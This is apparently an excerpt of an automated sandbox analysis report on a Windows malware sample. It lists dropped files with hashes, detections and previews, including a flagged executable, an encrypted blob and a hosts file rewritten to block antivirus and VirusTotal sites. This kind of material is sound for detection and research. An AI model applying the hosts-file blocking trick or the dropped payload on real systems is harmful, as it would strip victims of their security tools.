                                                                                                                  SSDEEP:24:ML9E4Ks29E4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKzd
                                                                                                                  MD5:12BC6A423CB11584DBBB3264AE68E0CE
                                                                                                                  SHA1:DE1E6954FF5E326226AD5469C3F1F0AC9E41C461
                                                                                                                  SHA-256:3592978914563991F47FFE8DDBBDC9CAAAD2B31F530335F17277192231015D6A
                                                                                                                  SHA-512:AF328D01DFD1B3733A0746A0C313A00FAF40CD02A5710BB40C17088C7F02D7E83B2C176C794ACD54BEEDDA2910D7DBDFB4DACC9282F19988D1271E2C805AB675
                                                                                                                  Malicious:true
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ProgramStarter.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):1211
                                                                                                                  Entropy (8bit):5.349329844867972
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzE
                                                                                                                  MD5:01E8E56005273B0ECADB5A7F9D85DC09
                                                                                                                  SHA1:B96A534655E4506577313F8B6DE0CB1A79AC0506
                                                                                                                  SHA-256:7BA9385539AD5F701511668619265113287F5292BBB2D50A3193C7565EB0CA96
                                                                                                                  SHA-512:A906F7CB6E346ADAE80116287725DF37C7E57AAF65DE82DC571907AFC86D5C36CC3EF317CB1ED82CD5C906F24BB3A8EDCABA8371D909EFF4A48CEC2FF23088D3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10434
                                                                                                                  Entropy (8bit):4.94012526707092
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Xxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smcSydcU6Cazpo:6BVoGIpN6KQkj2Wkjh4iUxQedNYoGibY
                                                                                                                  MD5:8C18848AE92C662B40A42CFF5982C50A
                                                                                                                  SHA1:B1E5B9D40A279A48D883EB460BD7CD78CDC7416F
                                                                                                                  SHA-256:66799228E6C44EBFEBD6AFAF15DF5894A5BEB2B8CAE365C88BCA10DE5ACE0D90
                                                                                                                  SHA-512:1DC92D1940C9976CC991FED360BF18D2FD01B2237B1613869A9B0357EBAC51EA0DE7C0B3B3254F5A90CDA6EA99621501DFAB08D8FD81FF2E9792FBBEC8D0191E
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22136
                                                                                                                  Entropy (8bit):5.574336755690247
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:utCRq0x3eVaaQUA0Rbr+RnY4xnRbBqRmQQoSLjc1naRLhWbcYg9DrdFIlrBWI+iv:53cQBoAY4xRdqRmQzOqa3C72kw7S
                                                                                                                  MD5:880CD6909D7CAF2777E03D0386CF4C24
                                                                                                                  SHA1:2DA8A0A8B806F833AA3AE7799AB17EC6D8C1A5DE
                                                                                                                  SHA-256:9EE8DDC3BB664EB372595DEB794F8730FE90FED1E5C6BEA6136BFA8C6A399F04
                                                                                                                  SHA-512:20B907778B45121F106059B8A0C587C7AEDB27FF2DF1E28EFFB28AED840DE4B01077827832A07DDFAA549426CB50206F360486A9DFF73974CC839294F7C8FD13
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........W.........)...........,..............@..........H...............<@.^.L."My...:/..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11008348563804743
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:26YLeTXm/Ey6q9995neNq3qQ10nMCldimE8eawHjc0HP:26TKl683LyMCldzE9BHjciP
                                                                                                                  MD5:69A1E51487EAE089A78B27364EA05DC8
                                                                                                                  SHA1:2AF103FB0AD1E6C928C23DD9D9E03263E95DDCB5
                                                                                                                  SHA-256:6BC5E78B78908B9A995E7E9558D5E24E0E0B4BEEA112E08378E2E72B539748BB
                                                                                                                  SHA-512:41FBF2BBB2E4774C34D6E68CC732246209C4A12F0885DF6AE1170C0DD5BE99E6A45CF06E4983F96C5E4A71278E418B1C96833250F3BD67240F352D744EF1438B
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4......d.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ........2Z..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....4.....d....................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11255444863100625
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:wXjXm/Ey6q9995ncdg1miM3qQ10nMCldimE8eawHza1miIo6P:bl68mS1tMLyMCldzE9BHza1tID
                                                                                                                  MD5:E2A96493082A5B2A7C530DF69F5B50AB
                                                                                                                  SHA1:C567BCC50C8C07C1479176ED212B4DB86B742C8E
                                                                                                                  SHA-256:F2DD43F2FE995FAA2514861FE04B6176DE7D556FEF5CCF6C0E44B443599FCA1F
                                                                                                                  SHA-512:847C43303679F99E878D2A7C3E2B34EFC52EBD2C95FBE83A249E1976EFFE983C43D29153E493A6C81FCCA17F136D0BE1B9AB4117D05A7BB674A93B73167B5307
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4....,.c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....3h;.2Z..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....4....4.c....................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11226972425315478
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:w1jXm/Ey6q9995nu71mK2P3qQ10nMCldimE8eawHza1mKEAP:Fl68c1iPLyMCldzE9BHza15
                                                                                                                  MD5:BFA1B44C4A3CBB0FEB152699F2DC21FB
                                                                                                                  SHA1:71BAF7F8B7783D12ADFEC56A9FA929D3C96EEF6F
                                                                                                                  SHA-256:B1A1A8CDA1F994C157D45AB1A53938267B9BFED4028E07B798CA7163F0F5016E
                                                                                                                  SHA-512:3FF1FFB4C15A895E7C7912AA4FD675A5E1CE9184BE7CE42E53D65405C30B39E134C789E94856CD73C13C45D849A072BB090FCD140D9E5D1E615A52EE1B1C8D07
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4......c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ......i..2Z..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....4......c....................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\ProgramStarter.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):471552
                                                                                                                  Entropy (8bit):7.74633642850456
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:7Pu1GphsJNnK2PoiC7FMUxvuB150WBuYpIEnHVk6hGO/FNcJv9qPs2w85KmdMd:VsbKaoiYFjvuf504dVk6C
                                                                                                                  MD5:0326F45523014399DEA91452C957B5E0
                                                                                                                  SHA1:47A4B2F2C8AFDB5EFBAD429F2EA3485B3752EC45
                                                                                                                  SHA-256:1A3DB0001B52CB3F6E16C45FC2D4D70FC3706B421A9B2B5006172026C60D84D7
                                                                                                                  SHA-512:2AA4B7AF945A936B16405A125FEE48C998DD42B8423F7CD56B5B49E7D270786D23D359729FB7E7DD212369AAAAB98C3E444F05C902F1C1E15416F7828AD21B42
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.O..........."...0..&..........>E... ...`....@.. ....................................`..................................D..W....`...............................D............................................... ............... ..H............text...D%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B................ E......H........-..............T,..p...............................................f.L.,........D{.q5h...v.........#!...W..b3..T...-.....k\.L-uj.@...ro..P.q.K...~-e...Jh.kV-t..+F..S..E..6.a...r$z.O.K......R...@.aC..V...2...e4P.A..3..yL....OP#4m.l2M2..T....2..q.$..Q)..-3......+o...?L.........H.$%nNo.k.-.|....V._..O....lZE.oPz$"o..............U7....Y...x. .5O....#.,4...u(...>.i..w..~.]..........1..E:......i..d.r.L=.}.h....X.....W.......z..d..N.O-Pmh.......!6L?.!.X....

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nooqsj1v.gcj.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Preview:1

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxcm1fgp.u3u.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Preview:1

                                                                                                                  C:\Users\user\AppData\Local\Temp\mib.bin

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):916
                                                                                                                  Entropy (8bit):6.006091656254043
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                  MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                  SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                  SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                  SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                  Malicious:false
                                                                                                                  Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..

                                                                                                                  C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11008348563804743
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:26YLeTXm/Ey6q9995neNq3qQ10nMCldimE8eawHjc0HP:26TKl683LyMCldzE9BHjciP
                                                                                                                  MD5:69A1E51487EAE089A78B27364EA05DC8
                                                                                                                  SHA1:2AF103FB0AD1E6C928C23DD9D9E03263E95DDCB5
                                                                                                                  SHA-256:6BC5E78B78908B9A995E7E9558D5E24E0E0B4BEEA112E08378E2E72B539748BB
                                                                                                                  SHA-512:41FBF2BBB2E4774C34D6E68CC732246209C4A12F0885DF6AE1170C0DD5BE99E6A45CF06E4983F96C5E4A71278E418B1C96833250F3BD67240F352D744EF1438B
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4......d.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ........2Z..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....4.....d....................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11255444863100625
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:wXjXm/Ey6q9995ncdg1miM3qQ10nMCldimE8eawHza1miIo6P:bl68mS1tMLyMCldzE9BHza1tID
                                                                                                                  MD5:E2A96493082A5B2A7C530DF69F5B50AB
                                                                                                                  SHA1:C567BCC50C8C07C1479176ED212B4DB86B742C8E
                                                                                                                  SHA-256:F2DD43F2FE995FAA2514861FE04B6176DE7D556FEF5CCF6C0E44B443599FCA1F
                                                                                                                  SHA-512:847C43303679F99E878D2A7C3E2B34EFC52EBD2C95FBE83A249E1976EFFE983C43D29153E493A6C81FCCA17F136D0BE1B9AB4117D05A7BB674A93B73167B5307
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4....,.c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....3h;.2Z..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....4....4.c....................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11226972425315478
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:w1jXm/Ey6q9995nu71mK2P3qQ10nMCldimE8eawHza1mKEAP:Fl68c1iPLyMCldzE9BHza15
                                                                                                                  MD5:BFA1B44C4A3CBB0FEB152699F2DC21FB
                                                                                                                  SHA1:71BAF7F8B7783D12ADFEC56A9FA929D3C96EEF6F
                                                                                                                  SHA-256:B1A1A8CDA1F994C157D45AB1A53938267B9BFED4028E07B798CA7163F0F5016E
                                                                                                                  SHA-512:3FF1FFB4C15A895E7C7912AA4FD675A5E1CE9184BE7CE42E53D65405C30B39E134C789E94856CD73C13C45D849A072BB090FCD140D9E5D1E615A52EE1B1C8D07
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4......c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ......i..2Z..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....4......c....................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20230319_071724_277.etl

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8192
                                                                                                                  Entropy (8bit):3.316154307964996
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:DC71Copo+FP53T9ah2YSFCcbSI2lQvkfM4gOT2EYFzjUMC66JRW:W79raw+62y1fCVw
                                                                                                                  MD5:4CF13DC20FD1BCD6838CAC8881A01737
                                                                                                                  SHA1:6B3D0F4953812D697E459925D1AB88315BBDCFF4
                                                                                                                  SHA-256:0BE7297588FB8B312E20BCB27575C40538659A3B96D0DCD3CE4D131D084A1AF6
                                                                                                                  SHA-512:0E6B8E9A88F3D0679F93A484FAEB98083C2A015177E687BDB59DFA33A797213D89FCFFEC3932E08E44FA470081A010162E933055F259EC0BE11C67D9F5836F27
                                                                                                                  Malicious:false
                                                                                                                  Preview:.... ... ....................................... ...!...............................P.....g......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................WW...... ......Td.2Z..........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.3.0.3.1.9._.0.7.1.7.2.4._.2.7.7...e.t.l.........P.P.....P.....g.....................................................................................................................................................................................................................................................................

                                                                                                                  C:\Windows\System32\drivers\etc\hosts

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1716
                                                                                                                  Entropy (8bit):4.530975095186605
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:vDZhyoZWM9rU5fFcJrWirF481Yws9hCXu5RC:vDZEurK9UrHh481Yws9oXu5RC
                                                                                                                  MD5:461BAE7420051BED72CE164F6F1C498B
                                                                                                                  SHA1:AAD0052A3377DC02FB86E6D9C91E43D7FE1F901F
                                                                                                                  SHA-256:E9EF2F7E0207DA969485B9EA8E973E24F025A52511DFE2C25BE19DC26076F68F
                                                                                                                  SHA-512:ADD15C7424B09CDB52DCB121C99E9C355287F025D438FEA70A366760F6968CE896D285A283683A4948B1602CE3160DA32835805B287916642422E2FD9C39A6B3
                                                                                                                  Malicious:true
                                                                                                                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com..0.0.0.0 kaspersky.com.0.0.0.0 www.kaspersky.com..0.0.0.0 avast.com.0.0.0.0 www.avast.com..0.0.0.0 av

                                                                                                                  C:\mib.bin

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):916
                                                                                                                  Entropy (8bit):6.006091656254043
                                                                                                                  Encrypted:false
